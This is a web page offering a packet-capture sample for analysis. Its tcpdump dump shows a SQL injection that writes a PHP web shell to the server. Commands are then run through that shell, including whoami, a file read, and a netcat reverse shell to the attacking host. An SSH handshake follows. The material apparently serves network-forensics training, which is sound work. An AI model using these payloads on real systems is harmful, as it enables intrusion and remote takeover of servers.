Text Example

Webshell shell.php Command Access SSH Server PCAP Analysis File Download

Download Attachments

  • 1 pcap 37
    Date added: May 24, 2019 12:01 am Added by: admin File size: 4 MB Downloads: 77

2018-10-14 12:34:34.199552 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1:334, ack 1, win 229, options [nop,nop,TS val 769026432 ecr 738855], length 333: HTTP: GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET[‘cmd’]);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22–%20 HTTP/1.1
E…XA@.?……2
..d…P…f{J.I…..F…..
-.i…F’GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET[‘cmd’]);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22–%20 HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:34.199573 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [.], ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 0
E..4.a@.@…
..d…2.P..{J.I……………
..F(-.i.
2018-10-14 12:34:34.202294 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1:996, ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 995: HTTP: HTTP/1.1 200 OK
E….b@.@.|.
..d…2.P..{J.I……………
..F(-.i.HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 586
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-vType: text/html

2018-10-14 12:34:34.210976 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 334:545, ack 996, win 244, options [nop,nop,TS val 769026434 ecr 738856], length 211: HTTP: GET /docs/shell.php?cmd=whoami HTTP/1.1
E…XC@.?……2
..d…P….{J.,………..
-.i…F(GET /docs/shell.php?cmd=whoami HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:34.220266 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 996:1295, ack 545, win 2078, options [nop,nop,TS val 738861 ecr 769026434], length 299: HTTP: HTTP/1.1 200 OK
E.._.c@.@…
..d…2.P..{J.,……………
..F–.i.HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 29
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html

……….+//.MI,I…..@f …
2018-10-14 12:34:34.263625 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [.], ack 1295, win 260, options [nop,nop,TS val 769026448 ecr 738861], length 0
E..4XD@.?……2
..d…P….{J.W…..S…..
-.i…F-
2018-10-14 12:34:37.227759 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 545:772, ack 1295, win 260, options [nop,nop,TS val 769027189 ecr 738861], length 227: HTTP: GET /docs/shell.php?cmd=cat%20/etc/lsb-release HTTP/1.1
E…XE@.?……2
..d…P….{J.W….6……
-.lu..F-GET /docs/shell.php?cmd=cat%20/etc/lsb-release HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:37.233154 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1295:1662, ack 772, win 2212, options [nop,nop,TS val 739614 ecr 769027189], length 367: HTTP: HTTP/1.1 200 OK
E….d@.@..Y
..d…2.P..{J.W…i…..,…..
..I.-.luHTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:37 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 97
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:34:52.294903 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1657:1941, ack 2981, win 337, options [nop,nop,TS val 769030955 ecr 742627], length 284: HTTP: GET /docs/shell.php?cmd=/bin/bash%200%3C/var/tmp/pipe%20%7C%
20nc%20192.0.2.50%20443%201%3E/var/tmp/pipe HTTP/1.1
E..PXO@.?……2
..d…P….{J…..Q…….
-.{+..T.GET /docs/shell.php?cmd=/bin/bash%200%3C/var/tmp/pipe%20%7C%20nc%20192.0.2.50%20443%201%3E/var/tmp/pipe HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:52.307291 IP 10.1.2.100.45298 > 192.0.2.50.443: Flags [S], seq 3484359733, win 14600, options [mss 1460,sackOK,TS val 743383 ecr 0,nop,wscale 3], length 0
E.. 10.1.2.100.45298: Flags [R.], seq 0, ack 3484359734, win 0, length 0
E..(..@.?..H…2
..d………..6P…B………
2018-10-14 12:34:52.309383 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 2981:3271, ack 1941, win 2882, options [nop,nop,TS val 743383 ecr 769030955], length 290: HTTP: HTTP/1.1 200 OK
E..V.i@.@…
..d…2.P..{J………B…….
..W.-.{+HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:52 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:54:51.821265 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [P.], seq 1:40, ack 1, win 1825, length 39
E..O..@.@.+5
..d
..d…D….g…P..!….SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1

2018-10-14 12:54:51.827631 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 1:497, ack 40, win 256, length 496
E…#.@…..
..d
..d.D..g…….P….5..SSH-2.0-PuTTY_Release_0.70
…L…U.4|..m..u~……..curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,rsa2048-sha256,rsa1024-sha1,diffie-hellman-group1-sha1…Wssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-rsa,ssh-dss….aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly
2018-10-14 12:54:51.827650 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 497:1133, ack 40, win 256, length 636
E…#.@…..
..d
..d.D..g…….P…s…1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128….aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128….hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com….hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com… none,zlib… none,zlib……………..
2018-10-14 12:54:51.827709 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [.], ack 497, win 1959, length 0
E..(..@.@.+[
..d
..d…D….g…P…….
2018-10-14 12:54:51.827744 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [.], ack 1133, win 2118, length 0
E..(..@.@.+Z
..d
..d…D….g..-P..F….
2018-10-14 12:54:51.828554 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [P.], seq 40:1024, ack 1133, win 2118, length 984
E…..@.@.’.
..d
..d…D….g..-P..F…….. ..*3.3…p.V#.$……ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1…#ssh-rsa,ssh-dss,ecdsa-sha2-nistp256….aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se….aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se….hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96….hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96….none,zlib@openssh.com….none,zlib@openssh.com………………….
2018-10-14 12:54:51.839985 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 1133:1213, ack 1024, win 252, length 80
E..x#.@…..
..d
..d.D..g..-..”.P….R…..L…..A……E……E0

Leave a Reply